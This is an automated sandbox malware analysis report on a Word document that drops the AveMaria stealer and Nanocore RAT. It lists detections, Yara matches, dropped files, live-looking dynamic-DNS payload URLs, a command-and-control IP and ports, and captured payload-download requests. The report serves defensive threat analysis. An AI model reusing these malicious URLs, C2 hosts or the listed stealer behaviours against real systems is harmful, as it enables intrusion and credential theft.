Windows Analysis Report N40-MR 311.doc

Overview

General Information

Sample Name: N40-MR 311.doc
Analysis ID: 457806
MD5: 0284c94401a743d97b9cca52ac790864
SHA1: fc3a473b80e9f717a68c54374aadc016cfe0d9ed
SHA256: 433fef750a44d6d44ebc9acf291ae3ad5812531d8aba3bdf543d44dcff943694
Tags: doc

Detection

AveMaria Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Powershell download and execute file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AveMaria stealer
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Contains functionality to hide user accounts
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Document exploit detected (process start blacklist hit)
Found suspicious RTF objects
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides user accounts
Increases the number of concurrent connections per server for Internet Explorer
Injects a PE file into a foreign process
Injects files into Windows application
Installs a global keyboard hook
Machine Learning detection for dropped file
Microsoft Office creates scripting files
Office process drops PE file
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Uses dynamic DNS services
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate processes and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Exploit for CVE-2017-0261
Sigma detected: PowerShell Download from URL
Sigma detected: Verclsid.exe Runs COM Object
Spawns drivers
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://hutyrtit.ydns.eu/microC.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://hutyrtit.ydns.eu/microC.exe Virustotal: Detection: 17%
Multi AV Scanner detection for dropped file
Source: C:\Program Files\Microsoft DN1\sqlmap.dll Metadefender: Detection: 20%
Source: C:\Program Files\Microsoft DN1\sqlmap.dll ReversingLabs: Detection: 42%
Source: C:\ProgramData\images.exe Metadefender: Detection: 34%
Source: C:\ProgramData\images.exe ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\images.exe Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\images.exe ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\microA.exe Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\microA.exe ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Roaming\JhwfHBtD..exe ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Roaming\microA.exe Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Roaming\microA.exe ReversingLabs: Detection: 62%
Multi AV Scanner detection for submitted file
Source: N40-MR 311.doc Virustotal: Detection: 43%
Yara detected AveMaria stealer
Source: Yara match File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Yara detected Nanocore RAT
Source: Yara match File source: 00000024.00000002.2368647593.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\microA.exe Joe Sandbox ML: detected
Source: C:\ProgramData\images.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\microA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\JhwfHBtD..exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\images.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 25.2.images.exe.400000.1.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 17.2.microA.exe.400000.2.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 16.2.microA.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 18.2.microA.exe.400000.1.unpack Avira: Label: TR/Crypt.XPACK.Gen2

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA, 16_2_0040A8C3
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree, 16_2_0040C261
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree, 16_2_0040C3B9
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey, 16_2_0040C419
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW, 16_2_00409D97
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree, 16_2_0040C6BD
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA, 17_2_0040A8C3
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree, 17_2_0040C261
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree, 17_2_0040C3B9
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey, 17_2_0040C419
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW, 17_2_00409D97
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree, 17_2_0040C6BD
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA, 18_2_0040A8C3
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree, 18_2_0040C261
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree, 18_2_0040C3B9
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey, 18_2_0040C419
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW, 18_2_00409D97
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree, 18_2_0040C6BD
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA, 25_2_0040A8C3
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree, 25_2_0040C261
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree, 25_2_0040C3B9
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey, 25_2_0040C419
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW, 25_2_00409D97
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree, 25_2_0040C6BD
Source: C:\Users\user\AppData\Local\Temp\microA.exe Directory created: C:\Program Files\Microsoft DN1
Source: C:\Users\user\AppData\Local\Temp\images.exe Directory created: C:\Program Files\Microsoft DN1\sqlmap.dll
Source: C:\Users\user\AppData\Local\Temp\images.exe Directory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp
Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB* source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: images.exe
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2100227357.0000000001FB0000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2103552908.0000000002420000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\System.pdb$ source: powershell.exe, 00000006.00000002.2101750206.0000000001DD4000.00000004.00000040.sdmp
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00411446 FindFirstFileW,FindNextFileW, 16_2_00411446
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 16_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00411446 FindFirstFileW,FindNextFileW, 17_2_00411446
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 17_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00411446 FindFirstFileW,FindNextFileW, 18_2_00411446
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 18_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00411446 FindFirstFileW,FindNextFileW, 25_2_00411446
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 25_2_0040955B
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW, 16_2_0041154A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: microA[1].exe.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: newhosteeeee.ydns.eu
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 203.159.80.186:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 203.159.80.186:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49169 -> 203.159.80.186:8234
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 203.159.80.186:8234
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 203.159.80.186:8234
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 203.159.80.186:8234
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 203.159.80.186:8234
Uses dynamic DNS services
Source: unknown DNS query: name: hhjhtggfr.duckdns.org
Contains functionality to download and execute PE files
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040290E URLDownloadToFileW,ShellExecuteW, 16_2_0040290E
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 203.159.80.186:6703
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK | Content-Type: application/octet-stream | Last-Modified: Fri, 30 Jul 2021 09:52:56 GMT | Accept-Ranges: bytes | ETag: "b34311ac2885d71:0" | Server: Microsoft-IIS/8.5 | Date: Mon, 02 Aug 2021 08:45:33 GMT | Content-Length: 525312
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK | Content-Type: application/octet-stream | Last-Modified: Fri, 30 Jul 2021 09:52:56 GMT | Accept-Ranges: bytes | ETag: "b34311ac2885d71:0" | Server: Microsoft-IIS/8.5 | Date: Mon, 02 Aug 2021 08:45:38 GMT | Content-Length: 525312
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK | Content-Type: application/octet-stream | Last-Modified: Mon, 02 Aug 2021 07:13:53 GMT | Accept-Ranges: bytes | ETag: "382415f36d87d71:0" | Server: Microsoft-IIS/8.5 | Date: Mon, 02 Aug 2021 08:46:50 GMT | Content-Length: 1378816
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /microA.exe HTTP/1.1 | Host: newhosteeeee.ydns.eu | Connection: Keep-Alive
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /microA.exe HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: newhosteeeee.ydns.eu Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /microC.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: hutyrtit.ydns.eu Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040290E URLDownloadToFileW,ShellExecuteW, 16_2_0040290E
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16BDD4F7-5649-4CA3-B477-D1894D362AA0}.tmp
Source: global traffic HTTP traffic detected: GET /microA.exe HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: newhosteeeee.ydns.eu Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /microA.exe HTTP/1.1 Host: newhosteeeee.ydns.eu Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /microC.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: hutyrtit.ydns.eu Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: newhosteeeee.ydns.eu
Source: powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp String found in binary or memory: httP://newhosteeeee.ydn
Source: powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp String found in binary or memory: httP://newhosteeeee.ydns.eu/micr
Source: powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2101479507.0000000000654000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2101084138.0000000000413000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2101559005.0000000001C26000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp String found in binary or memory: httP://newhosteeeee.ydns.eu/microA.exe
Source: powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2108498771.0000000003823000.00000004.00000001.sdmp String found in binary or memory: httP://newhosteeeee.ydns.eu/microA.exePE
Source: powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp String found in binary or memory: http://newhosteeeee.ydns.eu
Source: powershell.exe, 00000003.00000002.2107782562.000000000372A000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.2111095740.000000001B4F0000.00000004.00000001.sdmp String found in binary or memory: http://newhosteeeee.ydns.eu/microA.exe
Source: powershell.exe, 00000003.00000002.2101386936.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2103676493.0000000002520000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000003.00000002.2101386936.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2103676493.0000000002520000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000003.00000002.2099920892.0000000000419000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000003.00000002.2099858527.00000000003CE000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://w
Source: powershell.exe, 00000003.00000002.2099920892.0000000000419000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000006.00000002.2100972290.000000000039E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.comJ
Source: microA.exe, images.exe String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, microA.exe, 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\AppData\Local\Temp\images.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\images.exe
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BCCBD0 GetOpenClipboardWindow, 25_2_03BCCBD0
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040813A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx, 16_2_0040813A
Installs a raw input device (often for capturing keystrokes)
Source: microA.exe, 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp Binary or memory string: GetRawInputData

E-Banking Fraud:

Yara detected AveMaria stealer
Source: Yara match File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
